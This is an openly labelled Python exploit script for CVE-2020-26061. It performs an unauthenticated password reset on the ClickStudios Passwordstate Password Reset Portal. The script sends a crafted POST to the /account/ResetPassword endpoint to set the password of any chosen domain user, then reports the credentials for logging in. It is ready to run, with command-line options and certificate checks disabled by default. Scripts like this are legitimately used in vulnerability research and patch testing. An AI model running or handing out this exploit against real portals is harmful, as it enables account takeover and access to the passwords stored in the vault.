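#!/usr/bin/env python3
#############################################################################################################################################
# Exploit Title: ClickStudios Passwordstate Password Reset Portal Authentication Bypass
# Date: 2020-10-05
# Exploit Author: Jason Juntunen (missingnull) https://github.com/missing0x00
# Software Link: https://www.clickstudios.com.au/passwordstate-changelog.aspx
# Version: ClickStudios Passwordstate Password Reset Portal Before 8.5 build 8501
# CVE: CVE-2020-26061
#############################################################################################################################################
"""Proof of concept for CVE-2020-26061.

The PoC sends a single unauthenticated XHR-style POST to the Password Reset
Portal's ``/account/ResetPassword`` endpoint carrying a ``DOMAIN\\user`` name
and a new password. On an unpatched portal that request is accepted as-is,
so the caller ends up knowing the target account's password.

Changes versus the original one-shot script:
  * the shebang is on line 1 (``# !/usr/bin/env python`` was never honoured),
  * success is decided by parsing the JSON body instead of substring-matching
    ``"Success":true`` (which breaks on ``"Success": true``),
  * the reset is wrapped in ``main()`` with an exit status, so the script can
    be imported or scripted, and transport errors are reported instead of
    escaping as a traceback,
  * TLS verification stays OFF by default (typical targets use self-signed
    certificates), but ``--verify-tls`` lets you opt back in.
"""
import argparse
import json
import sys

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

RESET_PATH = "/account/ResetPassword"
DEFAULT_PASSWORD = "m!ss!ngNULL0x00"
REQUEST_TIMEOUT = 60

# Mimic the browser XHR the portal's own page issues; X-Requested-With is the
# header the endpoint keys its JSON response on.
HTTP_HEADERS = {
    "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Connection": "Close",
}


def build_parser() -> argparse.ArgumentParser:
    """Return the CLI parser (same flags and dest names as the original)."""
    parser = argparse.ArgumentParser(
        description="Exploit for CVE-2020-26061 - PasswordState Password Reset Portal Authentication Bypass",
    )
    parser.add_argument('-t', help='Target URL', dest='TARGET', type=str, required=True)
    parser.add_argument('-d', help='Domain', dest='DOMAIN', type=str, required=True)
    parser.add_argument('-u', help='User Name', dest='USERNAME', type=str, required=True)
    parser.add_argument('-p', help='New Password', dest='PASSWORD', type=str, default=DEFAULT_PASSWORD)
    parser.add_argument(
        '--verify-tls',
        help='Verify the target TLS certificate (off by default; most portals are self-signed)',
        dest='VERIFY_TLS',
        action='store_true',
    )
    return parser


def build_reset_payload(domain: str, name: str, new_pass: str) -> dict[str, str]:
    """Form fields the portal expects: ``DOMAIN\\user`` plus the new password twice."""
    return {
        "user_name": domain + '\\' + name,
        "Password": new_pass,
        "ConfirmPassword": new_pass,
    }


def reset_succeeded(body: str) -> bool:
    """Return True if the portal's response reports the reset as successful.

    The endpoint replies with JSON containing a boolean ``Success`` field.
    Parse it rather than looking for the literal ``"Success":true`` so a
    serialiser that emits ``"Success": true`` is not misreported as a
    failure. If the body is not JSON at all, fall back to the original
    substring test so behaviour on odd responses is unchanged.
    """
    try:
        payload = json.loads(body)
    except ValueError:
        return '"Success":true' in body
    return isinstance(payload, dict) and payload.get("Success") is True


def main(argv: list[str] | None = None) -> int:
    """Run the password reset against the target; return a process exit code.

    0 = portal reported success, 1 = portal rejected the reset (bad
    domain/user or patched), 2 = the HTTP request itself failed.
    """
    args = build_parser().parse_args(argv)
    # Strip a trailing slash so "https://host/" does not become "host//account/...".
    reset_url = args.TARGET.rstrip("/") + RESET_PATH
    user_name = args.DOMAIN + '\\' + args.USERNAME
    new_pass = args.PASSWORD
    payload = build_reset_payload(args.DOMAIN, args.USERNAME, new_pass)

    if not args.VERIFY_TLS:
        # Deliberately insecure: the PoC talks to internal, usually
        # self-signed portals. Silence urllib3's warning only in that mode.
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

    with requests.Session() as session:
        try:
            response = session.post(
                reset_url,
                headers=HTTP_HEADERS,
                data=payload,
                verify=args.VERIFY_TLS,
                timeout=REQUEST_TIMEOUT,
            )
        except requests.RequestException as exc:
            print("Error! Request to " + reset_url + " failed: " + str(exc))
            return 2

    print(response.text)
    if reset_succeeded(response.text):
        print("Done! You can now log in as " + user_name + ":" + new_pass)
        return 0
    print("Error! Check your domain/username, otherwise application may be patched.")
    return 1


if __name__ == "__main__":
    sys.exit(main())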